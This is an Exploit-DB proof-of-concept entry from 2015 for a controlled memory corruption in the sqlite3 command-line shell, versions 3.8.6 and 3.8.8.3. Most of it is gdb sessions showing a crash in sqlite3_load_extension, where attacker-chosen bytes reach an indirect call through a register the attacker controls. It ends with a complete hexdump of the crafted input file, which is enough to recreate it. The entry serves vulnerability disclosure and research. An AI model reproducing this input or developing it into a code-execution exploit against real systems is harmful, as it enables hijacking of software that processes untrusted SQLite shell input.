SQLite3 3.8.6 - Controlled Memory Corruption (PoC)

EDB-ID:

36190


Type:

dos


Platform:

Linux

Date:

2015-02-26


# Exploit Title: SQLite3 controlled memory corruption PoC (0day)
# Date: [date]
# Exploit Author: Andras Kabai
# Vendor Homepage: http://www.sqlite.org/
# Software Link: http://www.sqlite.org/download.html
# Version: 3.8.6, 3.8.8.3
# Tested on: Ubuntu 14.10, 64 bit 3.8.6 (latest available package), 3.8.8.3 (built from the latest source code)

Using a crafted input (e.g. from a malicious file via “-init” parameter or directly given to the std input of the program) it is possible to trigger a memory corruption vulnerability in the most recent version of SQLite3. The memory corruption could be controlled, therefore the program flow could be manipulated by the attacker.

The following sections demonstrates the attack against the apt-get installed installed and updated sqlite3 and against a newer version that is built from source.

====

andrew@ubufuzzx6401:~/issues/sqlite$ which sqlite3
/usr/bin/sqlite3
andrew@ubufuzzx6401:~/issues/sqlite$ /usr/bin/sqlite3 -version
3.8.6 2014-08-15 11:46:33 9491ba7d738528f168657adb43a198238abde19e
andrew@ubufuzzx6401:~/issues/sqlite$ gdb64 /usr/bin/sqlite3
GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from /usr/bin/sqlite3...(no debugging symbols found)...done.
(gdb) set disassembly-flavor intel
(gdb) set args < sqlitepoc.txt
(gdb) r
Starting program: /usr/bin/sqlite3 < sqlitepoc.txt
warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Usage: .trace FILE|off
Error: near line 4: near "whatever": syntax error
Usage: .trace FILE|off

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff7ba06a0 in sqlite3_load_extension () from /usr/lib/x86_64-linux-gnu/libsqlite3.so.0
(gdb) i r
rax            0x138	312
rbx            0x41414141424242	18367622009733698
rcx            0x7fffffffb590	140737488336272
rdx            0x0	0
rsi            0x555555779b43	93824994483011
rdi            0x41414141424242	18367622009733698
rbp            0x555555779b43	0x555555779b43
rsp            0x7fffffffb4c0	0x7fffffffb4c0
r8             0x555555779b41	93824994483009
r9             0x6c	108
r10            0x0	0
r11            0x0	0
r12            0x555555779b48	93824994483016
r13            0x7fffffffb590	140737488336272
r14            0x555555779b40	93824994483008
r15            0x2	2
rip            0x7ffff7ba06a0	0x7ffff7ba06a0 <sqlite3_load_extension+736>
eflags         0x10246	[ PF ZF IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0
(gdb) disas $rip,+10
Dump of assembler code from 0x7ffff7ba06a0 to 0x7ffff7ba06aa:
=> 0x00007ffff7ba06a0 <sqlite3_load_extension+736>:	call   QWORD PTR [rbx+0x48]
   0x00007ffff7ba06a3 <sqlite3_load_extension+739>:	mov    r15,rax
   0x00007ffff7ba06a6 <sqlite3_load_extension+742>:	lea    rax,[rip+0x12bc1]        # 0x7ffff7bb326e
End of assembler dump.

===

andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ ./lt-sqlite3 -version
3.8.8.3 2015-02-25 13:29:11 9d6c1880fb75660bbabd693175579529785f8a6b
andrew@ubufuzzx6401:~/tmp/build/sqlite-autoconf-3080803/.libs$ gdb64 ./lt-sqlite3
GNU gdb (Ubuntu 7.8-1ubuntu4) 7.8.0.20141001-cvs
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./lt-sqlite3...done.
(gdb) set disassembly-flavor intel
(gdb) set args < /home/andrew/issues/sqlite/sqlitepoc.txt
(gdb) r
Starting program: /home/andrew/tmp/build/sqlite-autoconf-3080803/.libs/lt-sqlite3 < /home/andrew/issues/sqlite/sqlitepoc.txt
warning: the debug information found in "/lib64/ld-2.19.so" does not match "/lib64/ld-linux-x86-64.so.2" (CRC mismatch).

[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".
Usage: .trace FILE|off
Error: near line 4: near "whatever": syntax error
Usage: .trace FILE|off

Program received signal SIGSEGV, Segmentation fault.
sqlite3LoadExtension (pzErrMsg=0x7fffffffb510, zProc=0x0, zFile=0x6261c3 "CCCCBBBBAAAA", db=0x6261c8) at sqlite3.c:36169
36169	      }
(gdb) i r
rax            0x138	312
rbx            0x41414141424242	18367622009733698
rcx            0x7fffffffb510	140737488336144
rdx            0x0	0
rsi            0x6261c3	6447555
rdi            0x41414141424242	18367622009733698
rbp            0x6261c3	0x6261c3
rsp            0x7fffffffb440	0x7fffffffb440
r8             0x6261c1	6447553
r9             0x6c	108
r10            0x7fffffffb270	140737488335472
r11            0x7ffff7b5ae50	140737349267024
r12            0x6261c8	6447560
r13            0x7fffffffb510	140737488336144
r14            0x6261c0	6447552
r15            0x2	2
rip            0x7ffff7b5b130	0x7ffff7b5b130 <sqlite3_load_extension+736>
eflags         0x10246	[ PF ZF IF RF ]
cs             0x33	51
ss             0x2b	43
ds             0x0	0
es             0x0	0
fs             0x0	0
gs             0x0	0
(gdb) disas $rip,+10
Dump of assembler code from 0x7ffff7b5b130 to 0x7ffff7b5b13a:
=> 0x00007ffff7b5b130 <sqlite3_load_extension+736>:	call   QWORD PTR [rbx+0x48]
   0x00007ffff7b5b133 <sqlite3_load_extension+739>:	mov    r15,rax
   0x00007ffff7b5b136 <sqlite3_load_extension+742>:	lea    rax,[rip+0x587d8]        # 0x7ffff7bb3915
End of assembler dump.

====

andrew@ubufuzzx6401:~/issues/sqlite$ hexdump -C sqlitepoc.txt
00000000  3b 0a 2e 74 20 78 0a 2e  74 0a 77 68 61 74 65 76  |;..t x..t.whatev|
00000010  65 72 00 0a 3b 0a 2e 74  0a 2e 6f 70 0a 2e 6c 20  |er..;..t..op..l |
00000020  43 43 43 43 42 42 42 42  41 41 41 41 0a           |CCCCBBBBAAAA.|
0000002d